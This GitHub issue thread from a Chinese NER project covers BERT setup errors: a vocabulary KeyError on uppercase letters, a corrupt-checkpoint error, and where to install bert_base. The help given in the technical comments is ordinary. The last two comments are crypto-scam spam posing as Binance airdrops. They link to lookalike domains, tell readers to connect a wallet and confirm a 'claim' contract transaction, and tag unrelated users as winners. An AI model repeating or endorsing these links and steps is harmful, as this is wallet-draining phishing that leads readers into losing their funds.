### ISSUE TITLE
bert运行出现问题

### ISSUE THREAD

**Issue by LLawlietc** [yanwii/ChineseNER#18]
Traceback (most recent call last):
not enough values to unpack (expected 2, got 1)
  File "D:/dogtime/mission/BiGRU_crf/bert_data_utils.py", line 41, in load_data
    word, tag = line.split()
ValueError: not enough values to unpack (expected 2, got 1)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "D:/dogtime/mission/BiGRU_crf/bert_data_utils.py", line 119, in <module>
    bert_data_util = BertDataUtils(tokenizer)
  File "D:/dogtime/mission/BiGRU_crf/bert_data_utils.py", line 26, in __init__
    self.load_data()
  File "D:/dogtime/mission/BiGRU_crf/bert_data_utils.py", line 49, in load_data
    inputs_ids = self.tokenizer.convert_tokens_to_ids(ntokens)
  File "D:\dogtime\mission\BiGRU_crf\bert_base\bert\tokenization.py", line 179, in convert_tokens_to_ids
    return convert_by_vocab(self.vocab, tokens)
  File "D:\dogtime\mission\BiGRU_crf\bert_base\bert\tokenization.py", line 140, in convert_by_vocab
    output.append(vocab[item])
KeyError: 'D'

**Comment by LLawlietc** [comment]
您好，作者，按照你的用法不使用bert没有问题，使用bert模型的时候会报上面的错误。debug的时候发现是跑到数据end那一行的时候出的问题，inputs_ids = self.tokenizer.convert_tokens_to_ids(ntokens)应该是这里不对，但是找不到哪里有问题。

**Comment by yanwii** [comment]
可以定位到
`
File "D:\dogtime\mission\BiGRU_crf\bert_base\bert\tokenization.py", line 140, in convert_by_vocab
output.append(vocab[item])
KeyError: 'D'
`
可见错误是vocab没有D这个key，修改一下
`
vocab.get(item, UNK_TOKEN_INDEX)
`

**Comment by LLawlietc** [comment]
train data:      2757
nums of tags:    9
D:\Anaconda\Anaconda3\envs\tensorflow-gpu\lib\site-packages\tensorflow\python\ops\gradients_impl.py:97: UserWarning: Converting sparse I
ndexedSlices to a dense Tensor of unknown shape. This may consume a large amount of memory.
  "Converting sparse IndexedSlices to a dense Tensor of unknown shape. "
2020-04-17 17:21:54.547394: I C:\tf_jenkins\workspace\rel-win\M\windows-gpu\PY\36\tensorflow\core\platform\cpu_feature_guard.cc:137] You
r CPU supports instructions that this TensorFlow binary was not compiled to use: AVX AVX2
2020-04-17 17:21:54.680174: I C:\tf_jenkins\workspace\rel-win\M\windows-gpu\PY\36\tensorflow\core\common_runtime\gpu\gpu_device.cc:1105]
 Found device 0 with properties:
name: GeForce GTX 1060 major: 6 minor: 1 memoryClockRate(GHz): 1.6705
pciBusID: 0000:01:00.0
totalMemory: 6.00GiB freeMemory: 4.97GiB
2020-04-17 17:21:54.688171: I C:\tf_jenkins\workspace\rel-win\M\windows-gpu\PY\36\tensorflow\core\common_runtime\gpu\gpu_device.cc:1195]
 Creating TensorFlow device (/device:GPU:0) -> (device: 0, name: GeForce GTX 1060, pci bus id: 0000:01:00.0, compute capability: 6.1)
Traceback (most recent call last):
  File "model.py", line 503, in <module>
    model.train()
  File "model.py", line 329, in train
    ARGS.init_checkpoint)
  File "D:\dogtime\mission\论文相关\资源\BiGRU_crf\bert_base\bert\modeling.py", line 330, in get_assignment_map_from_checkpoint
    init_vars = tf.train.list_variables(init_checkpoint)
  File "D:\Anaconda\Anaconda3\envs\tensorflow-gpu\lib\site-packages\tensorflow\python\training\checkpoint_utils.py", line 89, in list_va
riables
    reader = load_checkpoint(ckpt_dir_or_file)
  File "D:\Anaconda\Anaconda3\envs\tensorflow-gpu\lib\site-packages\tensorflow\python\training\checkpoint_utils.py", line 60, in load_ch
eckpoint
    return pywrap_tensorflow.NewCheckpointReader(filename)
  File "D:\Anaconda\Anaconda3\envs\tensorflow-gpu\lib\site-packages\tensorflow\python\pywrap_tensorflow_internal.py", line 225, in NewCh
eckpointReader
    return CheckpointReader(compat.as_bytes(filepattern), status)
  File "D:\Anaconda\Anaconda3\envs\tensorflow-gpu\lib\site-packages\tensorflow\python\framework\errors_impl.py", line 473, in __exit__
    c_api.TF_GetCode(self.status.status))
tensorflow.python.framework.errors_impl.DataLossError: file is too short to be an sstable

**Comment by LLawlietc** [comment]
您好，作者，按你所说修改后运行显示 file is too short to be an sstable。我的文件目录按你之前的issue创建如下，网上找了一下也没有很好的解决办法，感谢作者的帮助
![捕获](https://user-images.githubusercontent.com/31651383/79554439-a2235980-80d0-11ea-9cf2-90458063d8ad.PNG)

**Comment by aleien95** [comment]
> 您好，作者，按你所说修改后运行显示 file is too short to be an sstable。我的文件目录按你之前的issue创建如下，网上找了一下也没有很好的解决办法，感谢作者的帮助
> ![捕获](https://user-images.githubusercontent.com/31651383/79554439-a2235980-80d0-11ea-9cf2-90458063d8ad.PNG)

兄弟这个bert的词典是没有区分大小写的，所以训练集的大写字母在vocab里面找不到哦。简单的解决办法就是你把数据集的大写改成小写就好了~

**Comment by baiyewww** [comment]
> 您好，作者，按你所说修改后运行显示 file is too short to be an sstable。我的文件目录按你之前的issue创建如下，网上找了一下也没有很好的解决办法，感谢作者的帮助
> ![捕获](https://user-images.githubusercontent.com/31651383/79554439-a2235980-80d0-11ea-9cf2-90458063d8ad.PNG)

你好，请问你解决了运行的问题了嘛，我的运行也出现了一些问题，请问bert_base这个目录下是什么文件呢

**Comment by hjay-code** [comment]
你好，请问这个bert_base在哪里获取
![QQ图片20201203152231](https://user-images.githubusercontent.com/64762039/100977052-6237b680-357b-11eb-989a-367b7fda828e.png)

**Comment by Wuhu0** [comment]
> 你好，请问这个bert_base在哪里获取 ![QQ图片20201203152231](https://user-images.githubusercontent.com/64762039/100977052-6237b680-357b-11eb-989a-367b7fda828e.png)
pip install bert-base==0.0.7 -i https://pypi.python.org/simple

**Comment by Wuhu0** [comment]
https://github.com/yanwii/ChineseNER/issues/18#issuecomment-737718390
pip install bert-base==0.0.7 -i https://pypi.python.org/simple

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by SASECOMPANY** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @xczh, @foolonhill, @cmgun, @metal-huang, @puppym, @yunhuan017, @shijitao, @van-bright, @omoola2802, @KittyKatt-Epic
